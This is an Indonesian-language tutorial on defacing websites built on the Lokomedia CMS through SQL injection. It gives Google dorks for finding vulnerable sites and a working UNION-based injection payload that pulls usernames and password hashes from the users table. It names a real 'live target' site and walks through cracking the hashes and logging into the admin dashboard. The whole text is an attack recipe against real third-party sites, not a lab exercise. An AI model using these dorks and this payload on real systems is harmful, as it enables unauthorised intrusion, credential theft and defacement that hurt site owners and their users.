Cara Deface PoC SQL Lokomedia

Kali ini we akan kasih tutorial cara deface poc sql lokomedia..
Ini adalah poc lama jadi maklum ea :v cuman buat nambah artikel aja...
Dan berbagi ilmu....

Dork :
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html

inurl:/statis-3-profil.html

Exploit : 
 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Hash : http://md5hashing.net/hash/

Live target : https://www.dapenbanksumut.com/statis-1-profil.html

1. Kalian dorking dahulu seperti biasa, dan pilih salah satu target

 2. Lalu kalian pilih targetnya atau live target aja

3. Setelah itu kalian masukin exploit nya seperti ini https://target.com/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
-profil.html , masukan setelah angka

4. Jika seperti ini kalian CTRL + U / Kalo diandroid view-source: didepan target

Boom.... keluar user ama password nya, tinggal kalian hash dan cari dashboard admin loginya